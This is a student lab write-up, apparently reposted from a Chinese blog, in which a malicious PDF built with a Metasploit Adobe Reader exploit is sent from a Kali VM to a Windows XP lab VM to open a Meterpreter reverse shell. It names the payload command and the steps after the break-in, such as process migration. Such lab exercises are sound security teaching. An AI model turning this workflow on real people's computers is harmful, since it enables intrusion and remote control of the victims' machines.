20145329 《网络对抗技术》客户端Adobe阅读器渗透攻击

两台虚拟机:
kali ip:192.168.96.130
windows xp sp3 ip:192.168.96.133

  • 1.kali下打开显示隐藏文件

  • 2.在kali终端中开启msfconsole。

  • 3.进入该漏洞模块并设置攻击有效载荷
    886473-20170416202202415-184950949.jpg

  • 4.查看需要需要设置的数据,并设置相应的参数
    886473-20170416202242852-567396392.png

  • 5.查看设置的参数信息
    886473-20170416202309868-2041623302.png

  • 6.打开exploit生成渗透攻击的pdf文件
    886473-20170416202339837-61561028.png

  • 7.将渗透文件发送到靶机,使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
    886473-20170416202854852-1089167580.png

  • 8、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,并设置相关的端口、ip等信息,需要与之前生成渗透文件的设置一样

  • 9.靶机打开pdf文件,攻击机启动exploit
    886473-20170416203100102-267313851.png

  • 10.sysinfo可以查看到靶机信息(忘了截图)

  • 11.使用ps查看当前进程,并找到explorer.exe的进程号转移到改进程号,输入图shell,获取靶机的shell
    886473-20170416203354352-2059945442.png

转载于:https://www.cnblogs.com/jdy1453/p/6719839.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值